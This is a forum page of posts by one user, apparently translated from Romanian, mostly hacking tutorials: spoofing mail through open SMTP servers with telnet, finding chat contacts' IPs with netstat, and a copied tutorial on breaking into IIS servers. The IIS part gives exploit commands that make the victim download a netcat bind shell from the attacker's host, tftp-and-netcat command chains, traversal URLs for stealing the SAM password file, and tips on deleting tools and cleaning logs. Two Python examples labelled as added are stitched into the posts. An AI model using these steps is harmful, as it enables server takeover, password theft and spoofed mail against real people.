BizZaroO

Posts posted by BizZaroO

  1. academic-blog.tk

    Warning!

    This blog contains culture at a risky level. If pleasant side effects appear, contact the blog admin.

    Recruiting authors!!

    If you like to write and know how to express yourself in an artistic and intelligent way, you can have your own category on the blog. For more details send a mail with one of your articles (no attached files), and if I like how you write you will have your own category where you can say your opinion in peace about anything!!

  2. So let me clear up the situation...

    1. the tutorial isn't made by me... I don't make tutorials because I have no talent for explaining

    2. it's not copy and paste, because I've had it on my computer for a long time... and I still have many tutorials

    Later edit: SIGKILL01, I don't think you know even half of what I know... you'll have the right to insult me when you have some seniority and have posted some programs and some things that help people too

  3. yonyx16

    You send it to someone (on mess) and while the server is being sent you go into CMD and type: "netstat -n" and press Enter. That's how you'll find out the victim's IP (it has port 5101, you'll find it)

    hey, pay attention, explain something to me... I typed netstat -n and it exited immediately

    I typed plain netstat, it stays a bit, shows some IPs and then exits

    so???

    I'm telling you that you typed netstat -n in Run... if you had typed it in cmd it wouldn't have exited!

    sorry for laughing, but I typed it in cmd ;) anyway... I solved the problem either way ;)

  4. TELNET

    What does telnet mean?

    Telnet (also known as a terminal emulator) is a console that lets a user use the resources of another system by connecting with its IP address. Of course, telnet is like a Trojan, attaching itself to the server or as the server. Using the telnet client, a user connects to a telnet server on a specific port. The specific port for Telnet is 23. I could say that telnet is the best tool for hackers. All the big hackers use it for exploiting loopholes in systems. You can run telnet by going to Run, typing telnet, then pressing Enter. In general on Win 9x/Me it will appear directly, but on WinXP or 2000 it will appear in DOS.

    To run telnet on Windows 95/98/Me, just open a file in Notepad.exe and write the following in it:

    REGEDIT4

    [HKEY_USERS\S-1-5-21-1229272821-1563985344-1060284298-1003\Software\Microsoft\Telnet]
    "MODE"="CONSOLE"

    Save the file under the name vreau_sa_fiu_un_mare_hacker.reg, and run it.

    Or simply run MS-DOS or Command (XP) and type telnet, then type "?/help" to view a list of commands.

    What could I do with telnet?

    Usually hackers connect to the telnet system, made up of Host and Port, trying to get root. First you need a very good port scanner that scans all the ports on a system; enter for example stefanx.ro and scan port 25. Then connect to that port using telnet. For example, I scanned the web server of a friend, who happens to be a big web developer, and I discovered that he has port 25 with an SMTP daemon running on it. So using telnet I connected to his server on port 25 using the SMTP client and sent a few anonymous mails to some friends...

    example:

    C:\>telnet

    Welcome to Microsoft Telnet Client

    Escape Character is 'CTRL+]'

    Microsoft Telnet> open sharka.ro 25

    Connecting to stefanx.ro....

    Connected..

    .

    .

    .

    now the SMTP service is mine... I just played around a bit... if you don't know the telnet commands, type 'HELP' on win9x or '?/HELP' on winXP. -Note: For SMTP, the specific port is 25.

    Now I'll show you how to send a fake mail through the ESMTP protocol (Extended Simple Mail Transfer Protocol):

    Telnet>open stefanx.ro 25

    Connecting....

    Connected to stefanx.ro

    220 Welcome to stefanx.ro ESMTP service 8.9.3

    HELO Stefan

    220 Welcome to sendmail Stefan

    MAIL E-mail

    240 Sender set to E-mail

    RCPT E-mail

    240 Recipient set to E-mail

    DATA

    220 End with "."

    Subject: Hi pizza!

    You know what, I'm sending fake mails through your SMTP, don't get upset.

    .

    240 CA55910 Message accepted for delivery..

    Think about what the values 240 and 220 and CA55910 mean...

    The values 240 and 220 are the codes of the messages sent by the server. For example, the server will reply with the value 220 to show a picture... you will see all the pictures that came along with 220...

    As for CA55910... it is the MSGID or Message ID... on the server, every message sent or received has an identifier; this message has CA55910. Just like your IP: the police will identify you by your IP. :o) That's why I'll try to write a lesson about spoofing, what it means and how to hide your IP.

    Note: This is my earnest request to each and everybody who reads this manual: please do not send any fake mail to E-mail and please do not use the service at anisurrahman.net. He is a very good friend of mine; I have learnt many things regarding web design and web programming from him.

    REMEMBER: Sometimes you can't connect to some servers... why? I don't know either; maybe they have a firewall, or maybe it's because I don't have enough knowledge.

    Yes!!! I sent a fake mail!!! I'm a hacker!!! OK!!!

    Sending a fake mail doesn't mean you're a hacker. It has nothing to do with hacking. Fake mails can be easily detected, as can the ISP, and you can lose your ISP account. Then, if the victim sends an e-mail to E-mail and complains about your activity, then I'm sorry, you lose your ISP account.

    Anyway, try sending fake mails to yourself, to get used to telnet.

    Don't get excited and don't start hacking with telnet, because it's not as easy as it seems. I set up the SMTP service sharka.ro myself, and I still haven't been able to get root on it.

    Of course there is much more you can do through telnet. For example, you can start with IRC (Internet Relay Chat). I'm sure you all know it. You can use mIRC, but it can't do very much...

    Now I think it's time to show you how an IRC server and/or mIRC works.

    To start the session, the program has to connect to an IRC server. The specific ports are 6667, 6668, 7000 etc. In mIRC,

    when you want to connect to a server, the port is usually 6667. Type: /server geneva.ch.eu.undernet.org 8000 in the mIRC window.

    If you don't give any port, the program will take it as 6667.

    This command will connect you to the server geneva.ch.eu.undernet.org; then by typing /join #channel you'll enter a channel, starting the session

    Tip: To see a user's IP, it's simple... Just type: /whois nick in the channel window. If you're at an internet cafe, you can easily access the computer's hard drive, which is usually protected by an icafe manager, by typing the command /run c: .

    Now I think you know the basics of mIRC.

    Now let's get to the point, starting an IRC session with telnet.

    In general, a lot of warfare (warez) programs are made for flooding, which means flooding with the same message, causing those connected to no longer be able to talk to each other, and the others to no longer be able to connect. But you can be detected easily, by your nick, finding your IP. The programs I made connect without a nick, there being a gap (empty spot) in the channel's client list, so the message is sent by nobody, and I am that gap, but even so...

    Now let's begin... the telnet connection to an IRC server on port 6667

    Telnet>open brussels.be.eu.undernet.org 6667

    <you will see some messages at this point>

    nick <crystygye>

    <other junk from the server>

    user <crystygye 127.0.0.1 localhost :HC>

    <now you will see a bunch of messages from the server>

    note: don't type the <> signs... I used them so I don't mix up the messages with the others.

    now you're connected to the server from mIRC; you can use the mIRC commands, though not in the mIRC way. To write a private message:

    PRIVMSG NICK MESSAGE : <Hello dear... Are you up for a chat? Sau da bula?>

    "sau da bula" I wrote intentionally (da = de).

    Now you surely know a thing or two about telnet.

    With telnet you can access and/or control a computer connected to the internet (Remote Computer).

    The idea of connecting through telnet

    Usually telnet is used for connecting to a particular server. Usually hackers use it to get root on that system. If you think you can connect to your ISP's SMTP and get root at your ISP, then forget all of that. First of all, hackers scan the ports on a certain target (IP, or server name), to find the open ports.

    Tip: You can use "Front Ambush". It's a very fast port scanner. You can download it from Ingerul Negru's web page - http://www.seinfeld.go.ro

    But if your ISP catches you scanning their ports, don't get mad at me.

    Now let's say you found an ftp server with port 23. All you have to do is connect to the port with telnet. But things can't be that easy... most ftp servers (approx. 98%) give you access only after asking for a valid user and password, so you need an account to be able to connect with your user and password to your account... or to other people's accounts, if you have the password too.

    Tip: To avoid getting caught, also learn about IP Spoofing. It's used for hiding your IP; I'll make a complete manual about that too, and you can get it from the same page. (http://www.seinfeld.go.ro)(http://www.dd-hacking.go.ro)
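    The fake-mail session above, replayed with both sides' messages, as an added example that is not part of the original post or of any server named in it. MiniSmtpServer is a toy server state machine written for this page; it answers with the reply codes RFC 5321 defines (220 greeting, 250 OK, 354 start mail input, 5xx errors) and stamps each accepted message with a queue ID, which is the traceable identifier the post calls MSGID. The hostname stefanx.ro is borrowed from the post's transcript; every address and the message text are made up.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class MiniSmtpServer:
    """Toy SMTP server (RFC 5321 subset), one transaction at a time."""
    hostname: str = "stefanx.ro"                     # assumed, taken from the post's transcript
    queue: List[Dict] = field(default_factory=list)  # accepted messages with their queue IDs
    helo: Optional[str] = None
    sender: Optional[str] = None
    rcpts: List[str] = field(default_factory=list)
    body: List[str] = field(default_factory=list)
    in_data: bool = False
    next_id: int = 1

    def greeting(self) -> str:
        return f"220 {self.hostname} ESMTP service ready"

    def _reset_envelope(self) -> None:
        self.sender, self.rcpts, self.body, self.in_data = None, [], [], False

    def handle(self, line: str) -> Optional[str]:
        """Process one client line; returns the reply, or None for a message body line."""
        if self.in_data:
            if line == ".":                          # lone dot ends the message
                queue_id = f"{self.next_id:06d}"
                self.next_id += 1
                self.queue.append({"id": queue_id, "helo": self.helo, "from": self.sender,
                                   "to": list(self.rcpts), "body": "\r\n".join(self.body)})
                self._reset_envelope()
                return f"250 {queue_id} Message accepted for delivery"
            # dot-unstuffing (RFC 5321 4.5.2): a leading ".." is a literal "."
            self.body.append(line[1:] if line.startswith("..") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            if not arg:
                return "501 Syntax: HELO hostname"
            self.helo = arg
            return f"250 {self.hostname} Hello {arg}"
        if verb == "MAIL":
            if self.helo is None:
                return "503 Send HELO/EHLO first"
            m = re.match(r"FROM:\s*<([^>]*)>", arg, re.I)
            if not m:
                return "501 Syntax: MAIL FROM:<address>"
            self.sender = m.group(1)                 # never verified: this is why the sender can be faked
            return "250 Sender OK"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Need MAIL command first"
            m = re.match(r"TO:\s*<([^>]*)>", arg, re.I)
            if not m:
                return "501 Syntax: RCPT TO:<address>"
            self.rcpts.append(m.group(1))
            return "250 Recipient OK"
        if verb == "DATA":
            if not self.rcpts:
                return "503 Need RCPT command first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "RSET":
            self._reset_envelope()
            return "250 OK"
        if verb == "QUIT":
            return f"221 {self.hostname} closing connection"
        return "500 Command not recognized"


def send_fake_mail(server: MiniSmtpServer, helo: str, mail_from: str,
                   rcpt_to: str, body_lines: List[str]) -> List[str]:
    """Drive the dialogue as a telnet user types it; returns the C:/S: transcript.

    Raises on any 4xx/5xx reply, the check a telnet user otherwise does by eye.
    """
    transcript = [f"S: {server.greeting()}"]

    def cmd(line: str) -> str:
        transcript.append(f"C: {line}")
        reply = server.handle(line)
        transcript.append(f"S: {reply}")
        if int(reply[:3]) >= 400:
            raise RuntimeError(f"server refused {line!r}: {reply}")
        return reply

    cmd(f"HELO {helo}")
    cmd(f"MAIL FROM:<{mail_from}>")              # any address is accepted: the envelope is unauthenticated
    cmd(f"RCPT TO:<{rcpt_to}>")
    cmd("DATA")
    for text in body_lines:                      # dot-stuff so a body line "." cannot end the message early
        transcript.append(f"C: {text}")
        server.handle("." + text if text.startswith(".") else text)
    cmd(".")
    cmd("QUIT")
    return transcript


if __name__ == "__main__":
    srv = MiniSmtpServer()
    for entry in send_fake_mail(srv, "Stefan", "someone@example.com", "friend@example.net",
                                ["Subject: hello", "", "sent through your SMTP by telnet"]):
        print(entry)
    print("server queue:", srv.queue)
```

    The queue entry the server keeps records the HELO name, the envelope sender and the queue ID; that entry, plus the connecting address a real daemon writes into the Received header, is what makes a "fake" mail traceable even though the MAIL FROM was accepted without any check.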

  5. I consider that to truly be a "hacker" you first have to know how to use the "weapons" you have at hand... the best "weapon" is cmd

    THE TUTORIAL IS NOT MADE BY ME

    Given that no such tutorial has been posted...

    Here's how things stand... if you really know how to get around well in the command prompt, you really don't need other programs to be a "hacker". Most Windows users don't really know what a powerful weapon they have installed on their PC and live with the idea that Linux is far superior to Windows for hacking. Well, I'll show you that it's not so. We'll start with some easy commands such as:

    -finding the IP of people on mess: to find the IP you just have to go to START>RUN and type the command "cmd". After the Command Prompt window appears, type "netstat -an", and it wasn't for nothing that I gave you the lesson on ports; now it's useful, because after you type "netstat -an" a series of IPs your PC has connected to appears. And since Yahoo Messenger usually uses port 5101... the IPs you want to find have port 5101 :>

    -finding the IP of a server or site: for this type the command "tracert and the site whose IP you want to find" EX: tracert www.yahoo.com

    Well, I could sit here for 2 years writing everything I know about cmd and still not finish; instead I'll give you the list of commands (not all of them) in cmd and it's up to you to practice.

    ADDUSERS Add or list users to/from a CSV file

    ARP Address Resolution Protocol

    ASSOC Change file extension associations

    ASSOCIAT One step file association

    AT Schedule a command to run at a later time

    ATTRIB Change file attributes

    BROWSTAT Get domain, browser and PDC info

    CACLS Change file permissions

    CALL Call one batch program from another

    CD Change Directory - move to a specific Folder

    CHANGE Change Terminal Server Session properties

    CHKDSK Check Disk - check and repair disk problems

    CHKNTFS Check the NTFS file system

    CHOICE Accept keyboard input to a batch file

    CIPHER Encrypt or Decrypt files/folders

    CleanMgr Automated cleanup of Temp files, recycle bin

    CLEARMEM Clear memory leaks

    CLIP Copy STDIN to the Windows clipboard.

    CLS Clear the screen

    CLUSTER Windows Clustering

    CMD Start a new CMD shell

    COLOR Change colours of the CMD window

    COMP Compare the contents of two files or sets of files

    COMPACT Compress files or folders on an NTFS partition

    COMPRESS Compress individual files on an NTFS partition

    CON2PRT Connect or disconnect a Printer

    CONVERT Convert a FAT drive to NTFS.

    COPY Copy one or more files to another location

    CSVDE Import or Export Active Directory data

    DATE Display or set the date

    Dcomcnfg DCOM Configuration Utility

    DEFRAG Defragment hard drive

    DEL Delete one or more files

    DELPROF Delete NT user profiles

    DELTREE Delete a folder and all subfolders

    DevCon Device Manager Command Line Utility

    DIR Display a list of files and folders

    DIRUSE Display disk usage

    DISKCOMP Compare the contents of two floppy disks

    DISKCOPY Copy the contents of one floppy disk to another

    DNSSTAT DNS Statistics

    DOSKEY Edit command line, recall commands, and create macros

    DSADD Add user (computer, group..) to active directory

    DSQUERY List items in active directory

    DSMOD Modify user (computer, group..) in active directory

    ECHO Display message on screen

    ENDLOCAL End localisation of environment changes in a batch file

    ERASE Delete one or more files

    EXIT Quit the CMD shell

    EXPAND Uncompress files

    EXTRACT Uncompress CAB files

    FC Compare two files

    FDISK Disk Format and partition

    FIND Search for a text string in a file

    FINDSTR Search for strings in files

    FOR Conditionally perform a command several times

    FORFILES Batch process multiple files

    FORMAT Format a disk

    FREEDISK Check free disk space (in bytes)

    FSUTIL File and Volume utilities

    FTP File Transfer Protocol

    FTYPE Display or modify file types used in file extension associations

    GLOBAL Display membership of global groups

    GOTO Direct a batch program to jump to a labelled line

    HELP Online Help

    HFNETCHK Network Security Hotfix Checker

    IF Conditionally perform a command

    IFMEMBER Is the current user in an NT Workgroup

    INSTSRV Install an NT Service

    IPCONFIG Configure IP

    KILL Remove a program from memory

    LABEL Edit a disk label

    LOCAL Display membership of local groups

    LOGEVENT Write text to the NT event viewer.

    LOGOFF Log a user off

    LOGTIME Log the date and time in a file

    MAPISEND Send email from the command line

    MEM Display memory usage

    MD Create new folders

    MODE Configure a system device

    MORE Display output, one screen at a time

    MOUNTVOL Manage a volume mount point

    MOVE Move files from one folder to another

    MOVEUSER Move a user from one domain to another

    MSG Send a message

    MSIEXEC Microsoft Windows Installer

    MSINFO Windows NT diagnostics

    MSTSC Terminal Server Connection (Remote Desktop Protocol)

    MUNGE Find and Replace text within file(s)

    MV Copy in-use files

    NET Manage network resources

    NETDOM Domain Manager

    NETSH Configure network protocols

    NETSVC Command-line Service Controller

    NBTSTAT Display networking statistics (NetBIOS over TCP/IP)

    NETSTAT Display networking statistics (TCP/IP)

    NOW Display the current Date and Time

    NSLOOKUP Name server lookup

    NTBACKUP Backup folders to tape

    NTRIGHTS Edit user account rights

    PATH Display or set a search path for executable files

    PATHPING Trace route plus network latency and packet loss

    PAUSE Suspend processing of a batch file and display a message

    PERMS Show permissions for a user

    PERFMON Performance Monitor

    PING Test a network connection

    POPD Restore the previous value of the current directory saved by PUSHD

    PORTQRY Display the status of ports and services

    PRINT Print a text file

    PRNCNFG Display, configure or rename a printer

    PRNMNGR Add, delete, list printers set the default printer

    PROMPT Change the command prompt

    PUSHD Save and then change the current directory

    QGREP Search file(s) for lines that match a given pattern.

    RASDIAL Manage RAS connections

    RASPHONE Manage RAS connections

    RECOVER Recover a damaged file from a defective disk.

    REG Read, Set or Delete registry keys and values

    REGEDIT Import or export registry settings

    REGSVR32 Register or unregister a DLL

    REGINI Change Registry Permissions

    REM Record comments (remarks) in a batch file

    REN Rename a file or files.

    REPLACE Replace or update one file with another

    RD Delete folder(s)

    RDISK Create a Recovery Disk

    RMTSHARE Share a folder or a printer

    ROBOCOPY Robust File and Folder Copy

    ROUTE Manipulate network routing tables

    RUNAS Execute a program under a different user account

    RUNDLL32 Run a DLL command (add/remove print connections)

    SC Service Control

    SCHTASKS Create or Edit Scheduled Tasks

    SCLIST Display NT Services

    ScriptIt Control GUI applications

    SET Display, set, or remove environment variables

    SETLOCAL Begin localisation of environment changes in a batch file

    SETX Set environment variables permanently

    SHARE List or edit a file share or print share

    SHIFT Shift the position of replaceable parameters in a batch file

    SHORTCUT Create a windows shortcut (.LNK file)

    SHOWGRPS List the NT Workgroups a user has joined

    SHOWMBRS List the Users who are members of a Workgroup

    SHUTDOWN Shutdown the computer

    SLEEP Wait for x seconds

    SOON Schedule a command to run in the near future

    SORT Sort input

    START Start a separate window to run a specified program or command

    SU Switch User

    SUBINACL Edit file and folder Permissions, Ownership and Domain

    SUBST Associate a path with a drive letter

    TASKLIST List running applications and services

    TIME Display or set the system time

    TIMEOUT Delay processing of a batch file

    TITLE Set the window title for a CMD.EXE session

    TOUCH Change file timestamps

    TRACERT Trace route to a remote host

    TREE Graphical display of folder structure

    TYPE Display the contents of a text file

    USRSTAT List domain usernames and last login

    VER Display version information

    VERIFY Verify that files have been saved

    VOL Display a disk label

    WHERE Locate and display files in a directory tree

    WHOAMI Output the current UserName and domain

    WINDIFF Compare the contents of two files or sets of files

    WINMSD Windows system diagnostics

    WINMSDP Windows system diagnostics II

    WMIC WMI Commands

    XCACLS Change file permissions

    XCOPY Copy files and folders

    try to get used to these commands and to understand each one of them.
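    The "netstat -an" trick from this post and from the Messenger thread above, done in code: an added example written for this page, not taken from the tutorial. It parses the Windows netstat -an layout (Proto, Local Address, Foreign Address, State) and returns the remote addresses of established TCP sessions that use a given port on either side. The netstat text is constructed (private and RFC 5737 test addresses, not a real capture) and port 5101 is the Yahoo Messenger convention the post quotes.

```python
import ipaddress
from typing import List, NamedTuple, Optional


class Conn(NamedTuple):
    proto: str
    local_host: str
    local_port: Optional[int]
    remote_host: str
    remote_port: Optional[int]   # None for the "*:*" wildcard netstat prints on UDP rows
    state: str                   # "" when netstat prints no state column (UDP)


def split_endpoint(text: str):
    """'10.0.0.5:5101' -> ('10.0.0.5', 5101); '[::1]:80' -> ('::1', 80); '*:*' -> ('*', None)."""
    host, _, port = text.rpartition(":")
    if host.startswith("[") and host.endswith("]"):
        host = host[1:-1]                 # IPv6 literal
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> List[Conn]:
    """Turn netstat -an output into Conn records, skipping banner and header lines."""
    conns = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        lhost, lport = split_endpoint(fields[1])
        rhost, rport = split_endpoint(fields[2])
        state = fields[3] if len(fields) > 3 else ""
        conns.append(Conn(fields[0], lhost, lport, rhost, rport, state))
    return conns


def peers_on_port(conns: List[Conn], port: int) -> List[str]:
    """Remote addresses of ESTABLISHED TCP sessions using `port` locally or remotely.

    Half-open (SYN_SENT) rows and loopback peers are dropped: neither is the
    other party of a working session.
    """
    peers = []
    for c in conns:
        if c.proto != "TCP" or c.state != "ESTABLISHED":
            continue
        if port not in (c.local_port, c.remote_port):
            continue
        try:
            if ipaddress.ip_address(c.remote_host).is_loopback:
                continue
        except ValueError:                # not a literal address; keep it
            pass
        if c.remote_host not in peers:
            peers.append(c.remote_host)
    return peers


# Constructed sample in the Windows "netstat -an" layout; not real output.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5101           0.0.0.0:0              LISTENING
  TCP    192.168.1.20:1039      203.0.113.10:5050      ESTABLISHED
  TCP    192.168.1.20:5101      192.168.1.37:1322      ESTABLISHED
  TCP    192.168.1.20:1217      10.0.0.5:5101          ESTABLISHED
  TCP    192.168.1.20:1218      10.0.0.9:5101          SYN_SENT
  TCP    [::1]:5101             [::1]:49200            ESTABLISHED
  UDP    0.0.0.0:4500           *:*
"""

if __name__ == "__main__":
    print(peers_on_port(parse_netstat(NETSTAT_SAMPLE), 5101))  # ['192.168.1.37', '10.0.0.5']
```

    The filter checks both ends because a direct file transfer can be initiated from either side: the peer may connect to your 5101 listener (second ESTABLISHED row) or you may connect to theirs (third). Run it against real output with `subprocess.run(["netstat", "-an"], capture_output=True, text=True).stdout`.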

  7. Hacking IIS Tutorial

    deface : frontpage : rds : main

    The Internet Information Server Attack - Remote buffer overflow exploit.

    By r00tsec from Security Espionage Community.

    Revised 03/16/00.

    This site is also available in plain text.

    Forewords:

    This text goes out to all those NT hackers out there. It is based on the info I have from the eEye Digital Security Team, which found the exploit, and on my own experience.

    Note: All the files used in this paper can be found at the main page.

    According to eEye Digital Security Team the systems affected include:

    Internet Information Server 4.0 (IIS4)

    Microsoft Windows NT 4.0 SP3 Option Pack 4

    Microsoft Windows NT 4.0 SP4 Option Pack 4

    Microsoft Windows NT 4.0 SP5 Option Pack 4

    I performed the attack from a Windows NT 4.0 machine with the required programs:

    iishack.exe

    ncx.exe or ncx99.exe or BertzSvc.exe

    Ncx.exe is a hacked-up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its arguments, which means that it binds cmd.exe to port 80. The eEye people have received some reports from people not being able to use ncx.exe, so they have made another hacked-up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which will also soon be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.

    How to do it:

    First of all you'll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find one, go to www.netcraft.com or your favorite "what's-this-site-running" search engine and find a victim running the affected system. Second, you need to craft a buffer overrun of about 3 k on the target machine!

    Then launch iishack.exe via the command prompt in WinNT.

    Output:

    --------(IIS 4.0 remote buffer overflow exploit)----------

    © dark spyrit -- barns@eeye.com. http://www.eEye.com

    [usage: iishack <host> <port> <url> ]

    eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe

    do not include 'http://' before hosts!

    ----------------------------------------------------------

    Then issue the command as you can see beneath ex.

    C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe

    Output (if successful):

    Data sent!

    note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.

    After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.

    Output:

    Microsoft® Windows NT

    © Copyright 1985-1996 Microsoft Corp.

    C:\>

    Voila! Access granted!

    Do whatever you wanna do, but remember to:

    - add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it)

    - add a scheduled task to delete ncx.exe after X-1 minutes.

    - clean the log files (if there are any).

    Corrections, suggestions or comments are accepted here

    ---------------------------------------------------------------

    Hi Folks,

    I have just compiled the well-known IIS tricks. I hope it will be helpful for securing your server.

    Any comment, suggestion or insult...? Welcome.

    MAB-

    SECURING IIS by BREAKING

    =====================================================

    by Mount Ararat Blossom

    9/15/2000

    mount_ararat_blossom@hotmail.com

    =====================================================

    01- Abstract

    I am not sure what you want to get out of this, but basically this paper is intended on breaking merely IIS web servers, especially versions 4.0 and 5.0, via TCP/IP over port 80. These techniques work even against so-called secure networks, just because every network, even the secured ones, lets HTTP connections in.

    =====================================================

    02- Intro

    Alright, so you all wanna know how to break into IIS web servers? First off, you should find a cgi-scanner so that things will get easier. My personal preferences are

    "whisker" by "rain forest puppy" (www.wiretrip.net/rfp).

    "cis" by "mnemonix" (www.cerberus-infosec.co.uk)

    To understand which server is running on the victim site

    telnet <victim> 80

    GET HEAD / HTTP/1.0

    and there you go with the name and the version of the web server. However, some sites might run their web servers over 8080, 81, 8000, 8001, and so on.

    To understand SSL web servers, which provide encryption between the web server and the browser, we use the tool "ssleay"

    s_client -connect <victim>:443

    HEAD / HTTP /1.0

    and here we go again.

    As I am writing this I am hoping that you will be able to use this to secure your web servers instead of using it to break into others.

    =====================================================

    03- Game Starts

    ========IIS HACK=====

    The folks at www.eeye.com have found a vulnerability in IIS 4.0 which allows us to upload a crafted version of netcat (the hacker's swiss army knife) onto the victim server and bind a cmd.exe on port 80.

    The vulnerability was a buffer overflow in .htr, .idc and .stm files. The problem is with insufficient bounds checking of the names in the URL for .htr, .stm and .idc files, allowing hackers to insert some backdoors to download and execute arbitrary commands on the local system as the administrator user.

    To hack the victim site we need

    iishack.exe

    ncx.exe (you can find these two at www.technotronic.com)

    plus we need a web server running on our attacking box.

    First off, run the web server on your attacking box and place the ncx.exe in your root directory.

    Then run iishack.exe against the victim site

    c:\>iishack.exe <victim> 80 <evil_hacker>/ncx.exe

    Then here we go, go and get your swiss army knife, namely netcat,

    c:\>nc <victim> 80 ==============>>>BOOM!

    The command prompt from the victim site suddenly appears on your box!!!

    D:\> or whatever it is, C; E; ...

    Do you want me to explain what to do next? Hey, come on, you must be kidding... hehe...

    =========MDAC- Local Command Execution===========

    You might think that it is a years-old vulnerability; however, what I see on pen-tests is that almost 40% of IIS web servers are still vulnerable to this.

    IIS' MDAC component has a vulnerability where an attacker can submit commands for local execution.

    The core problem is with the RDS Datafactory. By default, it allows remote commands to be sent to the IIS server. The commands will be run as the effective user of the service, which is typically the SYSTEM user.

    I won't get into details; if you want, go and check RFP's web site. However, you can find a vulnerable site by checking

    c:\>nc -nw -w 2 <victim> 80

    GET /msadc/msadcs.dll HTTP

    and if you get the following

    application/x_varg

    it is most probably vulnerable if not patched.

    You can find the exploits, mdac.pl and msadc2.pl, at rain forest puppy's web site at www.wiretrip.net/rfp. It checks for the vulnerability and, if it is vulnerable, it asks for the command you wanna execute:

    c:\> mdac.pl -h <victim>

    Please type the NT commandline you want to run (cmd /c assumed):\n

    cmd /c

    If you wanna change the web site, which is located at

    d:\inetpub\wwwroot\victimweb\index.htm

    then you can type:

    cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm

    or whatever you want, but my personal preference is uploading our swiss army knife, netcat, and binding cmd.exe to port 80. To do that I set up my TFTP server and put nc.exe in it. Then when I am asked to type the command I want to execute, I type the following:

    cmd/c cd %systemroot%&&tftp -i <evil_hacker> GET nc.exe&&del ftptmp
    && attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe

    There you go; go on, fire your netcat against the victim over port 80 and you get the eggshell, cmd.exe.....

    =========Codebrws.asp & Showcode.asp ==================

    Codebrws.asp and Showcode.asp are viewer files that ship with Microsoft IIS, but are not installed by default. The viewer is intended to be installed by the administrator to allow for the viewing of sample files as a learning exercise; however, the viewer does not restrict what files can be accessed. A remote attacker can exploit this vulnerability to view the contents of any file on the victim's server. However, there are several issues to be aware of:

    1. Codebrws.asp and showcode.asp are not installed by default.

    2. The vulnerability only allows for viewing of files.

    3. The vulnerability does not bypass Windows NT Access Control Lists (ACLs).

    4. Only files in the same disk partition can be viewed.

    5. Attackers must know the location of the requested file.

    Let's say you wanna see the code of codebrws.asp; request the following from your favorite web browser,

    http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

    then you will see the source code of codebrws.asp

    For using showcode.asp, do the following, again from your infamous browser

    http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/repair/sam._

    There you go, you get the infamous sam._ file; copy it, expand it and crack it using L0phtcrack, my personal choice, and you will get all user passwords, even the administrator one.

    =========Null.htw===============

    Microsoft IIS running with Index Server contains a vulnerability through Null.htw even if no .htw files exist on the server. The vulnerability displays the source code of an ASP page or other requested file. The ability to view ASP pages could provide sensitive information such as usernames and passwords. An attacker providing IIS with a malformed URL request could escape the virtual directory, providing access to the logical drive and root directory. The "hit-highlighting" function in the Index Server does not adequately restrain what types of files may be requested, allowing an attacker to request any file on the server. Microsoft has released a patch for Windows 2000 addressing this vulnerability.

    The Null.htw function has 3 variables which get their inputs from the user. These variables are as follows

    CiWebhitsfile

    CiRestriction

    CiHiliteType

    respectively.

    Say that we wanna see the source code of default.asp; then type the following from your favorite browser

    http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

    and you will get the source of the default.asp file.

    ========webhits.dll & .htw================

    The hit-highlighting functionality provided by Index Server allows a web user to have a document with their original search terms highlighted on the page. The name of the document is passed to the .htw file with the CiWebhitsfile argument. Webhits.dll, the ISAPI application that deals with the request, opens the file, highlights accordingly and returns the resulting page. As the user has control of the CiWebhitsfile argument passed to the .htw file, they can request anything they want. And the real problem is that they can view the source of ASP and other scripted pages.

    To understand whether you are vulnerable, request the following from the site

    http://www.victim.com/nosuchfile.htw

    If you get the following from the server

    format of the QUERY_STRING is invalid

    it means that you are vulnerable.

    The problem is because of webhits.dll (an ISAPI application) associated with .htw files. You can find the .htw files in the following locations of the infamous IIS web server,

    /iissamples/issamples/oop/qfullhit.htw

    /iissamples/issamples/oop/qsumrhit.htw

    /isssamples/exair/search/qfullhit.htw

    /isssamples/exair/search/qsumrhit.htw

    /isshelp/iss/misc/iirturnh.htw (this is normally for loopback)

    An attacker can, for instance, view the contents of the sam._ file as follows

    http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full

    will reveal the contents of the sam._ file, which is binary; you should copy it, expand it and crack it as I explained several times before.

    ===ASP Alternate Data Streams(::$DATA)==================

    The $DATA vulnerability, published in mid-1998, results from an error in the way the Internet Information Server parses file names. $DATA is an attribute of the main data stream (which holds the "primary content") stored within a file on the NT File System (NTFS). By creating a specially constructed URL, it is possible to use IIS to access this data stream from a browser. Doing so will display the code of the file containing that data stream and any data that file holds. This method can be used to display a script-mapped file that can normally be acted upon only by a particular Application Mapping. The contents of these files are not ordinarily available to users. However, in order to display the file, the file must reside on the NTFS partition and must have ACLs set to allow at least read access; the unauthorized user must also know the file name. Microsoft Windows NT Server's IIS versions 1.0, 2.0, 3.0 and 4.0 are affected by this vulnerability.

